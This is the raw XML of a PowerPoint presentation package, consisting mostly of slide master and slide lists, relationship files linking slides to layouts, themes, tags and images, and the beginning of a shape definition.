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0" r:id="rId3"/>
    <p:sldMasterId id="2147483652" r:id="rId4"/>
    <p:sldMasterId id="2147483654" r:id="rId5"/>
    <p:sldMasterId id="2147483657" r:id="rId6"/>
    <p:sldMasterId id="2147483659" r:id="rId7"/>
    <p:sldMasterId id="2147483661" r:id="rId8"/>
    <p:sldMasterId id="2147483663" r:id="rId9"/>
    <p:sldMasterId id="2147483665" r:id="rId10"/>
    <p:sldMasterId id="2147483667" r:id="rId11"/>
    <p:sldMasterId id="2147483669" r:id="rId12"/>
    <p:sldMasterId id="2147483671" r:id="rId13"/>
    <p:sldMasterId id="2147483673" r:id="rId14"/>
    <p:sldMasterId id="2147483675" r:id="rId15"/>
    <p:sldMasterId id="2147483677" r:id="rId16"/>
    <p:sldMasterId id="2147483679" r:id="rId17"/>
    <p:sldMasterId id="2147483681" r:id="rId18"/>
    <p:sldMasterId id="2147483683" r:id="rId19"/>
    <p:sldMasterId id="2147483685" r:id="rId20"/>
    <p:sldMasterId id="2147483687" r:id="rId21"/>
    <p:sldMasterId id="2147483689" r:id="rId22"/>
    <p:sldMasterId id="2147483691" r:id="rId23"/>
    <p:sldMasterId id="2147483693" r:id="rId24"/>
    <p:sldMasterId id="2147483695" r:id="rId25"/>
    <p:sldMasterId id="2147483697" r:id="rId26"/>
    <p:sldMasterId id="2147483699" r:id="rId27"/>
    <p:sldMasterId id="2147483701" r:id="rId28"/>
    <p:sldMasterId id="2147483703" r:id="rId29"/>
    <p:sldMasterId id="2147483705" r:id="rId30"/>
    <p:sldMasterId id="2147483707" r:id="rId31"/>
    <p:sldMasterId id="2147483709" r:id="rId32"/>
    <p:sldMasterId id="2147483711" r:id="rId33"/>
    <p:sldMasterId id="2147483713" r:id="rId34"/>
    <p:sldMasterId id="2147483715" r:id="rId35"/>
    <p:sldMasterId id="2147483717" r:id="rId36"/>
    <p:sldMasterId id="2147483719" r:id="rId37"/>
    <p:sldMasterId id="2147483721" r:id="rId38"/>
    <p:sldMasterId id="2147483723" r:id="rId39"/>
    <p:sldMasterId id="2147483725" r:id="rId40"/>
    <p:sldMasterId id="2147483727" r:id="rId41"/>
    <p:sldMasterId id="2147483729" r:id="rId42"/>
    <p:sldMasterId id="2147483731" r:id="rId43"/>
    <p:sldMasterId id="2147483733" r:id="rId44"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId47"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId45"/>
    <p:sldId id="263" r:id="rId46"/>
    <p:sldId id="665" r:id="rId48"/>
    <p:sldId id="642" r:id="rId49"/>
    <p:sldId id="643" r:id="rId50"/>
    <p:sldId id="644" r:id="rId51"/>
    <p:sldId id="729" r:id="rId52"/>
    <p:sldId id="666" r:id="rId53"/>
    <p:sldId id="691" r:id="rId54"/>
    <p:sldId id="766" r:id="rId55"/>
    <p:sldId id="690" r:id="rId56"/>
    <p:sldId id="692" r:id="rId57"/>
    <p:sldId id="743" r:id="rId58"/>
    <p:sldId id="744" r:id="rId59"/>
    <p:sldId id="746" r:id="rId60"/>
    <p:sldId id="747" r:id="rId61"/>
    <p:sldId id="750" r:id="rId62"/>
    <p:sldId id="749" r:id="rId63"/>
    <p:sldId id="689" r:id="rId64"/>
    <p:sldId id="693" r:id="rId65"/>
    <p:sldId id="703" r:id="rId66"/>
    <p:sldId id="757" r:id="rId67"/>
    <p:sldId id="752" r:id="rId68"/>
    <p:sldId id="767" r:id="rId69"/>
    <p:sldId id="753" r:id="rId70"/>
    <p:sldId id="754" r:id="rId71"/>
    <p:sldId id="755" r:id="rId72"/>
    <p:sldId id="756" r:id="rId73"/>
    <p:sldId id="696" r:id="rId74"/>
    <p:sldId id="697" r:id="rId75"/>
    <p:sldId id="698" r:id="rId76"/>
    <p:sldId id="699" r:id="rId77"/>
    <p:sldId id="700" r:id="rId78"/>
    <p:sldId id="637" r:id="rId79"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
      <p:regular r:id="rId84"/>
    </p:embeddedFont>
  </p:embeddedFontLst>
  <p:custDataLst>
    <p:tags r:id="rId8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7" name="1206988966@qq.com" initials="1" lastIdx="1" clrIdx="2"/>
  <p:cmAuthor id="1" name="刘 文杰" initials="刘" lastIdx="0" clrIdx="0"/>
  <p:cmAuthor id="8" name="姜伟光" initials="姜" lastIdx="1" clrIdx="0"/>
  <p:cmAuthor id="2" name="钟 方天" initials="钟" lastIdx="4" clrIdx="1"/>
  <p:cmAuthor id="3" name="lenovo" initials="l" lastIdx="1" clrIdx="2"/>
  <p:cmAuthor id="4" name="Administrator" initials="A" lastIdx="4" clrIdx="3"/>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A7AF"/>
    <a:srgbClr val="0000FF"/>
    <a:srgbClr val="FADBD8"/>
    <a:srgbClr val="37BECC"/>
    <a:srgbClr val="D7F2F5"/>
    <a:srgbClr val="E74C3C"/>
    <a:srgbClr val="CA3E9D"/>
    <a:srgbClr val="D12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1" d="100"/>
          <a:sy n="71" d="100"/>
        </p:scale>
        <p:origin x="412" y="44"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="4123"/>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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="tags/tag340.xml"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font1.fntdata"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/commentAuthors" Target="commentAuthors.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Master" Target="slideMasters/slideMaster7.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide34.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide33.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide32.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide31.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide30.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide29.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide28.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide27.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide26.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide25.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster6.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide24.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide23.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide22.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide21.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide20.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster5.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide14.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide13.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide12.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide9.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster4.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster43.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster42.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster41.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster40.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster39.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster3.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster38.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster37.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster36.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster35.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster34.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21922-B392-49CB-98B2-D1506FCEECF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082BF-40C1-4E6C-9085-1B48E30F0BD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23020B4-C4F0-47FB-9EF6-DA1D8CA35CE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
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{FE284FBA-1E51-41CA-94CE-3C4A9B97CA2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0"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0"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0"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0"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0"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0"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0"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0"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0"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0"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tags" Target="../tags/tag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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme20.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout21.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster21.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme21.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout22.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster22.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme22.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout23.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster23.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme23.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout24.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster24.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme24.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout25.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster25.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme25.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout26.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster26.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme26.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout27.xml"/></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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15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Layout" Target="../slideLayouts/slideLayout28.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster28.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme28.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15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slideLayout" Target="../slideLayouts/slideLayout29.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster29.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme29.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16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0"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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme30.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16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slideLayout" Target="../slideLayouts/slideLayout31.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster31.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme31.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17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slideLayout" Target="../slideLayouts/slideLayout32.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster32.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme32.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17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slideLayout" Target="../slideLayouts/slideLayout33.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster33.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme33.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17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Layout" Target="../slideLayouts/slideLayout34.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster34.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme34.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag18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Layout" Target="../slideLayouts/slideLayout35.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster35.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme35.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag18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slideLayout" Target="../slideLayouts/slideLayout36.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster36.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme36.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19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Layout" Target="../slideLayouts/slideLayout37.xml"/></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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19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Layout" Target="../slideLayouts/slideLayout38.xml"/></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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19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slideLayout" Target="../slideLayouts/slideLayout39.xml"/></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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag20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image" Target="../media/image3.svg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><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slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme4.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag20.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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag20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slideLayout" Target="../slideLayouts/slideLayout41.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster41.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme41.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21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slideLayout" Target="../slideLayouts/slideLayout42.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster42.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme42.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21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slideLayout" Target="../slideLayouts/slideLayout43.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster43.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme43.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag2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0"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0"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0"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3"/>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4"/>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8"/>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9"/>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10"/>
    </p:custData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image" Target="../media/image5.png"/><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image" Target="../media/image4.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21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8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8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tags" Target="../tags/tag29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tags" Target="../tags/tag29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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag29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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag29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6.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag29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5.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag295.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tags" Target="../tags/tag296.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2.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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag238.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag237.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag236.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag235.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag234.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag233.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag22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9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9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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag29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8.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag30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4.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag30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0.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag30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1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag30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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag304.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide29.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tags" Target="../tags/tag310.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image" Target="../media/image6.jpeg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag316.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag315.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tags" Target="../tags/tag305.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3.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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag248.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag247.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11.png"/><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11.png"/><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11.png"/><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11.png"/><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tags" Target="../tags/tag326.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide34.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tags" Target="../tags/tag329.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide25.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag339.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag338.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag337.xml"/><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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag259.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.svg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag258.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag249.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tags" Target="../tags/tag261.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag260.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tags" Target="../tags/tag263.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag26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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag265.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag264.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide8.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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag284.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag283.xml"/><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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide5.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag287.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag286.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag285.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag27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9" name="Google Shape;56;p15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="10504805" y="4194810"/>
            <a:ext cx="2939415" cy="4041775"/>
            <a:chOff x="-1006072" y="1271750"/>
            <a:chExt cx="4357952" cy="5991287"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="90" name="Google Shape;57;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1068003" y="1271750"/>
              <a:ext cx="486039" cy="429385"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
